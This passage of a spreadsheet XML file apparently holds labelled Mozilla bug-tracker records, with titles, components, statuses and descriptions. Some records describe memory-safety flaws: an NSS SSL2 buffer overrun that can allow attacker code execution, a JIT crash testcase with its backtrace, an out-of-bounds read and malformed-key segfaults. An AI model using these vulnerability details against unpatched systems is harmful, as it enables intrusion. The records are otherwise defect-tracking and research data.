        <is>
          <t>Assigning the same pointer value to an nsAutoPtr shouldn't crash exploitably</t>
        </is>
      </c>
      <c r="D1804" t="inlineStr">
        <is>
          <t>2013-03-28 18:53:56 -0700</t>
        </is>
      </c>
      <c r="E1804" t="n">
        <v>1</v>
      </c>
      <c r="F1804" t="n">
        <v>1</v>
      </c>
      <c r="G1804" t="n">
        <v>3</v>
      </c>
      <c r="H1804" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1804" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1804" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K1804" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1804" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1804" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1804" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1804" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1804" t="inlineStr">
        <is>
          <t>[adv-main20+]</t>
        </is>
      </c>
      <c r="Q1804" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1804" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1804" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T1804" t="n">
        <v>1</v>
      </c>
      <c r="U1804" t="n">
        <v>0</v>
      </c>
      <c r="V1804" t="n">
        <v>13</v>
      </c>
      <c r="W1804" t="inlineStr">
        <is>
          <t>nsAutoPtr prematurely frees its pointer if you assign "x = y;" when x is already equal to y.
Recently we've had some security bugs due to this behavior (bug 723446 and bug 827591).  Bug 723446 added a debug-only assertion to notice when this happens, and there was some discussion in that bug about changing the behavior.
"Smart" pointer classes shouldn't be such bad footguns, IMO.</t>
        </is>
      </c>
      <c r="X1804" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1805">
      <c r="A1805" t="n">
        <v>995289</v>
      </c>
      <c r="B1805" t="inlineStr">
        <is>
          <t>2014-04-11 09:46:23 -0700</t>
        </is>
      </c>
      <c r="C1805" t="inlineStr">
        <is>
          <t>Out-of-Bounds Read in mozilla::dom::OscillatorNodeEngine::ComputeCustom</t>
        </is>
      </c>
      <c r="D1805" t="inlineStr">
        <is>
          <t>2024-05-30 08:33:55 -0700</t>
        </is>
      </c>
      <c r="E1805" t="n">
        <v>1</v>
      </c>
      <c r="F1805" t="n">
        <v>1</v>
      </c>
      <c r="G1805" t="n">
        <v>3</v>
      </c>
      <c r="H1805" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1805" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1805" t="inlineStr">
        <is>
          <t>Web Audio</t>
        </is>
      </c>
      <c r="K1805" t="inlineStr">
        <is>
          <t>31 Branch</t>
        </is>
      </c>
      <c r="L1805" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1805" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1805" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1805" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1805" t="inlineStr">
        <is>
          <t>[adv-main29+]</t>
        </is>
      </c>
      <c r="Q1805" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1805" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1805" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T1805" t="n">
        <v>1</v>
      </c>
      <c r="U1805" t="n">
        <v>0</v>
      </c>
      <c r="V1805" t="n">
        <v>32</v>
      </c>
      <c r="W1805" t="inlineStr">
        <is>
          <t>Created attachment 8405470
poc.html
The poc crashes also firefox 28.0.
The asan report was generated with this build: http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/2014/04/2014-04-11-03-02-01-mozilla-central/firefox-31.0a1.en-US.linux-x86_64-asan.tar.bz2</t>
        </is>
      </c>
      <c r="X1805" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1806">
      <c r="A1806" t="n">
        <v>1243594</v>
      </c>
      <c r="B1806" t="inlineStr">
        <is>
          <t>2016-01-27 16:46:08 -0800</t>
        </is>
      </c>
      <c r="C1806" t="inlineStr">
        <is>
          <t>rest.js doesn't utf-8 encode payload causing 400 errors during device registration</t>
        </is>
      </c>
      <c r="D1806" t="inlineStr">
        <is>
          <t>2017-11-21 14:10:55 -0800</t>
        </is>
      </c>
      <c r="E1806" t="n">
        <v>1</v>
      </c>
      <c r="F1806" t="n">
        <v>1</v>
      </c>
      <c r="G1806" t="n">
        <v>2</v>
      </c>
      <c r="H1806" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1806" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1806" t="inlineStr">
        <is>
          <t>Firefox Accounts</t>
        </is>
      </c>
      <c r="K1806" t="inlineStr">
        <is>
          <t>46 Branch</t>
        </is>
      </c>
      <c r="L1806" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1806" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1806" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1806" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1806" t="inlineStr">
        <is>
          <t>[fxa-waffle-ignore]</t>
        </is>
      </c>
      <c r="Q1806" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1806" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1806" t="inlineStr">
        <is>
          <t>Firefox 47</t>
        </is>
      </c>
      <c r="T1806" t="n">
        <v>1</v>
      </c>
      <c r="U1806" t="n">
        <v>0</v>
      </c>
      <c r="V1806" t="n">
        <v>31</v>
      </c>
      <c r="W1806" t="inlineStr">
        <is>
          <t>From bug 1195569 in attachment 8712941 we can see the following entries:
&gt; 1453935569159	FirefoxAccounts	ERROR	error POSTing /account/device: {"code":400,"errno":999,"error":"Bad Request","message":"Invalid request payload JSON format","info":"https://github.com/mozilla/fxa-auth-server/blob/master/docs/api.md#response-format"}
&gt; 1453935569160	FirefoxAccounts	ERROR	device registration failed: {"code":400,"errno":999,"error":"Bad Request","message":"Invalid request payload JSON 
We should try and work out what this means.</t>
        </is>
      </c>
      <c r="X1806" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1807">
      <c r="A1807" t="n">
        <v>22305</v>
      </c>
      <c r="B1807" t="inlineStr">
        <is>
          <t>1999-12-21 13:32:52 -0800</t>
        </is>
      </c>
      <c r="C1807" t="inlineStr">
        <is>
          <t>[mlk] XUL prototype cache leaks on replace of proto docs and stylesheets</t>
        </is>
      </c>
      <c r="D1807" t="inlineStr">
        <is>
          <t>2024-04-15 01:53:03 -0700</t>
        </is>
      </c>
      <c r="E1807" t="n">
        <v>1</v>
      </c>
      <c r="F1807" t="n">
        <v>1</v>
      </c>
      <c r="G1807" t="n">
        <v>3</v>
      </c>
      <c r="H1807" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1807" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1807" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K1807" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1807" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1807" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1807" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1807" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1807" t="inlineStr"/>
      <c r="Q1807" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1807" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1807" t="inlineStr">
        <is>
          <t>M13</t>
        </is>
      </c>
      <c r="T1807" t="n">
        <v>1</v>
      </c>
      <c r="U1807" t="n">
        <v>0</v>
      </c>
      <c r="V1807" t="n">
        <v>7</v>
      </c>
      <c r="W1807" t="inlineStr">
        <is>
          <t>When a stylesheet or prototype document replaces an existing entry, the old
entry is leaked.</t>
        </is>
      </c>
      <c r="X1807" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1808">
      <c r="A1808" t="n">
        <v>1320170</v>
      </c>
      <c r="B1808" t="inlineStr">
        <is>
          <t>2016-11-24 10:30:10 -0800</t>
        </is>
      </c>
      <c r="C1808" t="inlineStr">
        <is>
          <t>Screensharing previews are broken in current nightlies</t>
        </is>
      </c>
      <c r="D1808" t="inlineStr">
        <is>
          <t>2017-07-27 05:25:13 -0700</t>
        </is>
      </c>
      <c r="E1808" t="n">
        <v>1</v>
      </c>
      <c r="F1808" t="n">
        <v>1</v>
      </c>
      <c r="G1808" t="n">
        <v>3</v>
      </c>
      <c r="H1808" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1808" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1808" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K1808" t="inlineStr">
        <is>
          <t>53 Branch</t>
        </is>
      </c>
      <c r="L1808" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1808" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1808" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1808" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1808" t="inlineStr"/>
      <c r="Q1808" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1808" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1808" t="inlineStr">
        <is>
          <t>mozilla54</t>
        </is>
      </c>
      <c r="T1808" t="n">
        <v>1</v>
      </c>
      <c r="U1808" t="n">
        <v>0</v>
      </c>
      <c r="V1808" t="n">
        <v>20</v>
      </c>
      <c r="W1808" t="inlineStr">
        <is>
          <t>The getUserMedia call made by webrtcUI.jsm fails and calls the error callback.
Steps to reproduce:
1. Load https://mozilla.github.io/webrtc-landing/gum_test.html
2. Click "Screen"
3. In the door hanger, select a screen instead of "No Screen"
Expected result: a preview of the screen should appear
Actual result: no preview, but clicking the "Allow" button works, and the page receives a stream as expected.
mozregression says https://hg.mozilla.org/integration/mozilla-inbound/pushloghtml?fromchange=39efc7bfb839484ef121a2f275481770906d9021&amp;tochange=5230f39d8f21270414aea3cdfb97914fc6acf4c1 -&gt; bug 1319045
One thing I can't explain is that the preview works fine in the browser-chrome mochitest I'm writing to cover the screensharing UI. I would like us to have test coverage for this.</t>
        </is>
      </c>
      <c r="X1808" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1809">
      <c r="A1809" t="n">
        <v>580151</v>
      </c>
      <c r="B1809" t="inlineStr">
        <is>
          <t>2010-07-19 19:54:22 -0700</t>
        </is>
      </c>
      <c r="C1809" t="inlineStr">
        <is>
          <t>Crash [@ nsSelectionState::DoTraverse] with textarea, changing root</t>
        </is>
      </c>
      <c r="D1809" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:50 -0700</t>
        </is>
      </c>
      <c r="E1809" t="n">
        <v>1</v>
      </c>
      <c r="F1809" t="n">
        <v>1</v>
      </c>
      <c r="G1809" t="n">
        <v>3</v>
      </c>
      <c r="H1809" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1809" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1809" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K1809" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1809" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1809" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1809" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1809" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1809" t="inlineStr">
        <is>
          <t>[sg:critical?] [qa-examined-191] [qa-examined-192]</t>
        </is>
      </c>
      <c r="Q1809" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1809" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1809" t="inlineStr">
        <is>
          <t>mozilla2.0b4</t>
        </is>
      </c>
      <c r="T1809" t="n">
        <v>1</v>
      </c>
      <c r="U1809" t="n">
        <v>0</v>
      </c>
      <c r="V1809" t="n">
        <v>22</v>
      </c>
      <c r="W1809" t="inlineStr">
        <is>
          <t>Created attachment 458543
testcase (crashes Firefox later, during cycle collection)
###!!! ASSERTION: bad action nesting!: 'mActionNesting&gt;0', file editor/libeditor/text/nsTextEditRules.cpp, line 250
###!!! ASSERTION: zero or negative placeholder batch count when ending batch!: 'mPlaceHolderBatch &gt; 0', file editor/libeditor/base/nsEditor.cpp, line 876
Crash [@ nsSelectionState::DoTraverse]</t>
        </is>
      </c>
      <c r="X1809" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1810">
      <c r="A1810" t="n">
        <v>616896</v>
      </c>
      <c r="B1810" t="inlineStr">
        <is>
          <t>2010-12-05 17:12:21 -0800</t>
        </is>
      </c>
      <c r="C1810" t="inlineStr">
        <is>
          <t>Requesting additional try test runs</t>
        </is>
      </c>
      <c r="D1810" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1810" t="n">
        <v>1</v>
      </c>
      <c r="F1810" t="n">
        <v>1</v>
      </c>
      <c r="G1810" t="n">
        <v>5</v>
      </c>
      <c r="H1810" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1810" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1810" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1810" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1810" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1810" t="inlineStr">
        <is>
          <t>Windows Server 2003</t>
        </is>
      </c>
      <c r="N1810" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1810" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1810" t="inlineStr">
        <is>
          <t>tryrequest</t>
        </is>
      </c>
      <c r="Q1810" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1810" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1810" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1810" t="n">
        <v>1</v>
      </c>
      <c r="U1810" t="n">
        <v>0</v>
      </c>
      <c r="V1810" t="n">
        <v>4</v>
      </c>
      <c r="W1810" t="inlineStr">
        <is>
          <t>Please run 5 more Windows debug mochitest-other tests on http://hg.mozilla.org/try/rev/c6dcd71e28b0 - I'm hoping to hit bug 612484, so I really only need the Win2K3 runs, but I can live with Win7 too if they can't be triggered separately.</t>
        </is>
      </c>
      <c r="X1810" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1811">
      <c r="A1811" t="n">
        <v>364319</v>
      </c>
      <c r="B1811" t="inlineStr">
        <is>
          <t>2006-12-18 23:56:33 -0800</t>
        </is>
      </c>
      <c r="C1811" t="inlineStr">
        <is>
          <t>SSL2 client vulnerability in non-DEBUG builds</t>
        </is>
      </c>
      <c r="D1811" t="inlineStr">
        <is>
          <t>2007-02-23 13:28:29 -0800</t>
        </is>
      </c>
      <c r="E1811" t="n">
        <v>1</v>
      </c>
      <c r="F1811" t="n">
        <v>1</v>
      </c>
      <c r="G1811" t="n">
        <v>3</v>
      </c>
      <c r="H1811" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1811" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J1811" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K1811" t="inlineStr">
        <is>
          <t>3.4</t>
        </is>
      </c>
      <c r="L1811" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1811" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1811" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1811" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1811" t="inlineStr">
        <is>
          <t>[sg:critical] [needs testscase]</t>
        </is>
      </c>
      <c r="Q1811" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1811" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1811" t="inlineStr">
        <is>
          <t>3.11.5</t>
        </is>
      </c>
      <c r="T1811" t="n">
        <v>1</v>
      </c>
      <c r="U1811" t="n">
        <v>0</v>
      </c>
      <c r="V1811" t="n">
        <v>12</v>
      </c>
      <c r="W1811" t="inlineStr">
        <is>
          <t>This vulnerability was reported to security@mozilla.org by email from 
vendor-disclosure@idefense.com, bearing the subject IDEF1973.  It says:
"This vulnerability was reported to iDefense by regenrecht."
An SSL server cert with an RSA public key that is too small to encrypt
the entire SSL2 "Master Secret" will cause optimized (not DEBUG) NSS 
builds to crash, and/or execute attacker-supplied code (on some platforms).
Disabling SSL2 is a complete defense.  Products with SSL2 disabled are 
believed to be invulnerable.
The bug has been present in NSS since at least NSS 3.4 and probably longer.
Function ssl_FormatSSL2Block starts with an assertion that the modulus is
long enough to properly encode the data to be encrypted, but that only has
effect in DEBUG builds.  In non-DEBUG builds, when the modulus is too short,
the code overruns the end of the too-short buffer.  The fix is to detect 
too-short modulii in all builds, not just DEBUG builds.  This probably 
should not be an ASSERT at all, but just a run time check.</t>
        </is>
      </c>
      <c r="X1811" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1812">
      <c r="A1812" t="n">
        <v>1500254</v>
      </c>
      <c r="B1812" t="inlineStr">
        <is>
          <t>2018-10-18 14:31:03 -0700</t>
        </is>
      </c>
      <c r="C1812" t="inlineStr">
        <is>
          <t>Assertion failure: tag &lt;= CalleeToken_Script, at js/src/jit/JitFrames.h:34</t>
        </is>
      </c>
      <c r="D1812" t="inlineStr">
        <is>
          <t>2023-12-06 07:50:02 -0800</t>
        </is>
      </c>
      <c r="E1812" t="n">
        <v>1</v>
      </c>
      <c r="F1812" t="n">
        <v>1</v>
      </c>
      <c r="G1812" t="n">
        <v>3</v>
      </c>
      <c r="H1812" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1812" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1812" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1812" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1812" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1812" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1812" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1812" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1812" t="inlineStr">
        <is>
          <t>[jsbugmon:]</t>
        </is>
      </c>
      <c r="Q1812" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1812" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1812" t="inlineStr">
        <is>
          <t>mozilla64</t>
        </is>
      </c>
      <c r="T1812" t="n">
        <v>1</v>
      </c>
      <c r="U1812" t="n">
        <v>0</v>
      </c>
      <c r="V1812" t="n">
        <v>7</v>
      </c>
      <c r="W1812" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 8f709fd4aa46 (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --disable-profiling --enable-debug --enable-optimize, run with --fuzzing-safe --ion-offthread-compile=off --ion-eager --ion-offthread-compile=off):
const m = (1 &lt;&lt; 28) - 1;
const f = m - 2;
let a = [];
for (let i = f - 16; i &lt; f + 16; i++)
  a[i] = i;
Backtrace:
received signal SIGSEGV, Segmentation fault.
0x0000555555bcd7bc in js::jit::GetCalleeTokenTag (token=&lt;optimized out&gt;) at js/src/jit/JitFrames.h:34
#0  0x0000555555bcd7bc in js::jit::GetCalleeTokenTag (token=&lt;optimized out&gt;) at js/src/jit/JitFrames.h:34
#1  js::jit::ScriptFromCalleeToken (token=&lt;optimized out&gt;) at js/src/jit/JitFrames.h:81
#2  0x0000555555bdbdb2 in js::jit::JSJitFrameIter::script (this=&lt;optimized out&gt;) at js/src/jit/JSJitFrameIter.cpp:126
#3  0x0000555555b9d5c5 in InvalidateActivation (activations=..., invalidateAll=invalidateAll@entry=false, fop=0x7ffff5f1a040) at js/src/jit/Ion.cpp:2795
#4  0x0000555555b9dcaa in js::jit::Invalidate (types=..., fop=fop@entry=0x7ffff5f1a040, invalid=..., resetUses=resetUses@entry=true, cancelOffThread=cancelOffThread@entry=true) at js/src/jit/Ion.cpp:2981
#5  0x000055555610ab8e in js::TypeZone::processPendingRecompiles (this=0x7ffff4902550, fop=0x7ffff5f1a040, recompiles=...) at js/src/vm/TypeInference.cpp:2832
#6  0x0000555555ad460f in js::AutoEnterAnalysis::~AutoEnterAnalysis (this=0x7fffffffc580, __in_chrg=&lt;optimized out&gt;) at js/src/vm/TypeInference-inl.h:486
#7  0x0000555556129b23 in js::ObjectGroup::markUnknown (this=0x7ffff4d88b80, sweep=..., cx=cx@entry=0x7ffff5f18000) at js/src/vm/TypeInference.cpp:3251
#8  0x0000555555948a28 in js::MarkObjectGroupUnknownProperties (obj=&lt;optimized out&gt;, cx=0x7ffff5f18000) at js/src/vm/TypeInference-inl.h:649
#9  js::TypeScript::MonitorAssign (id=..., obj=..., cx=0x7ffff5f18000) at js/src/vm/TypeInference-inl.h:829
#10 SetObjectElementOperation (cx=0x7ffff5f18000, obj=..., id=id@entry=..., value=value@entry=..., receiver=..., receiver@entry=..., strict=strict@entry=false, script=0x0, pc=0x0) at js/src/vm/Interpreter.cpp:1853
#11 0x000055555594bb35 in js::SetObjectElement (cx=&lt;optimized out&gt;, obj=obj@entry=..., index=..., index@entry=..., value=..., value@entry=..., strict=&lt;optimized out&gt;) at js/src/vm/Interpreter.cpp:5150
#12 0x0000555555c2972e in js::jit::IonSetPropertyIC::update (cx=&lt;optimized out&gt;, outerScript=..., ic=0x7ffff49353f0, obj=..., idVal=..., rhs=...) at js/src/jit/IonIC.cpp:301
#13 0x00001634b2102095 in ?? ()
#14 0x0000000000000000 in ?? ()
rax	0x0	0
rbx	0x7fffffffc290	140737488339600
rcx	0x7ffff6c1c2dd	140737333281501
rdx	0x0	0
rsi	0x7ffff6eeb770	140737336227696
rdi	0x7ffff6eea540	140737336223040
rbp	0x7fffffffc200	140737488339456
rsp	0x7fffffffc200	140737488339456
r8	0x7ffff6eeb770	140737336227696
r9	0x7ffff7fe6cc0	140737354034368
r10	0x58	88
r11	0x7ffff6b927a0	140737332717472
r12	0x2	2
r13	0x555556986780	93825013409664
r14	0x7fffffffc298	140737488339608
r15	0x5555568c5fbc	93825012621244
rip	0x555555bcd7bc &lt;js::jit::ScriptFromCalleeToken(js::jit::CalleeToken)+76&gt;
=&gt; 0x555555bcd7bc &lt;js::jit::ScriptFromCalleeToken(js::jit::CalleeToken)+76&gt;:	movl   $0x0,0x0
   0x555555bcd7c7 &lt;js::jit::ScriptFromCalleeToken(js::jit::CalleeToken)+87&gt;:	ud2</t>
        </is>
      </c>
      <c r="X1812" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1813">
      <c r="A1813" t="n">
        <v>1515342</v>
      </c>
      <c r="B1813" t="inlineStr">
        <is>
          <t>2018-12-19 07:26:34 -0800</t>
        </is>
      </c>
      <c r="C1813" t="inlineStr">
        <is>
          <t>Empty or malformed p256-ECDH public keys from project Wycheproof cause segfault</t>
        </is>
      </c>
      <c r="D1813" t="inlineStr">
        <is>
          <t>2020-06-05 00:04:27 -0700</t>
        </is>
      </c>
      <c r="E1813" t="n">
        <v>1</v>
      </c>
      <c r="F1813" t="n">
        <v>1</v>
      </c>
      <c r="G1813" t="n">
        <v>3</v>
      </c>
      <c r="H1813" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1813" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J1813" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K1813" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L1813" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1813" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1813" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1813" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1813" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main68+][adv-esr60.8+]</t>
        </is>
      </c>
      <c r="Q1813" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1813" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1813" t="inlineStr">
        <is>
          <t>3.45</t>
        </is>
      </c>
      <c r="T1813" t="n">
        <v>1</v>
      </c>
      <c r="U1813" t="n">
        <v>0</v>
      </c>
      <c r="V1813" t="n">
        <v>18</v>
      </c>
      <c r="W1813" t="inlineStr">
        <is>
          <t>Created attachment 9032424
p256_testcases.txt
Three testcases from Project Wycheproof for p256-ECDH cause segfaults in public key verification functions.
The testvector integration for p256-ECDH is not completed yet, so none of the wycheproof testvectors for p256-ECDH is runnning in CI yet. 
For now, the bug(s) can be reproduced by simply adding the three testcases to the testvector header file for the Curve25519 unittest. This test can handle the testvectors for p256 without any modification. 
&lt;&lt;&lt;&gt;&gt;&gt;
Steps to reproduce:
Checkout current version of NSS.
Add testvectors attached to this bug to gtests/common/testvectors/curve25519-vectors.h
Build NSS
run '../dist/Debug/bin/pk11_gtest --gtest_filter="*Curve25519*" '
&lt;&lt;&lt;&gt;&gt;&gt;
Expected Result
No test failures.
&lt;&lt;&lt;&gt;&gt;&gt;
Actual Result
segfault produced by each of the inserted p256 testcase(s) at line
https://searchfox.org/nss/rev/7bc70a3317b800aac07bad83e74b6c79a9ec5bff/lib/freebl/ec.c#451</t>
        </is>
      </c>
      <c r="X1813" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1814">
      <c r="A1814" t="n">
        <v>1354144</v>
      </c>
      <c r="B1814" t="inlineStr">
        <is>
          <t>2017-04-06 07:12:53 -0700</t>
        </is>
      </c>
      <c r="C1814" t="inlineStr">
        <is>
          <t>Allow basic keyboard navigation in panelmultiview subviews</t>
        </is>
      </c>
      <c r="D1814" t="inlineStr">
        <is>
          <t>2019-09-19 16:40:02 -0700</t>
        </is>
      </c>
      <c r="E1814" t="n">
        <v>1</v>
      </c>
      <c r="F1814" t="n">
        <v>1</v>
      </c>
      <c r="G1814" t="n">
        <v>2</v>
      </c>
      <c r="H1814" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1814" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1814" t="inlineStr">
        <is>
          <t>Toolbars and Customization</t>
        </is>
      </c>
      <c r="K1814" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1814" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1814" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1814" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1814" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1814" t="inlineStr">
        <is>
          <t>[photon-structure]</t>
        </is>
      </c>
      <c r="Q1814" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1814" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1814" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T1814" t="n">
        <v>1</v>
      </c>
      <c r="U1814" t="n">
        <v>0</v>
      </c>
      <c r="V1814" t="n">
        <v>16</v>
      </c>
      <c r="W1814" t="inlineStr">
        <is>
          <t>It should be possible to use the arrow keys to move up and down the list of menu items inside the subview that's currently active.
When the associated command of a selected item references another subview, hitting &lt;ENTER&gt; or the &lt;R-ARROW&gt; key will open that subview. In RTL-mode this should change to be the &lt;L-ARROW&gt; key.</t>
        </is>
      </c>
      <c r="X1814" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1815">
      <c r="A1815" t="n">
        <v>44119</v>
      </c>
      <c r="B1815" t="inlineStr">
        <is>
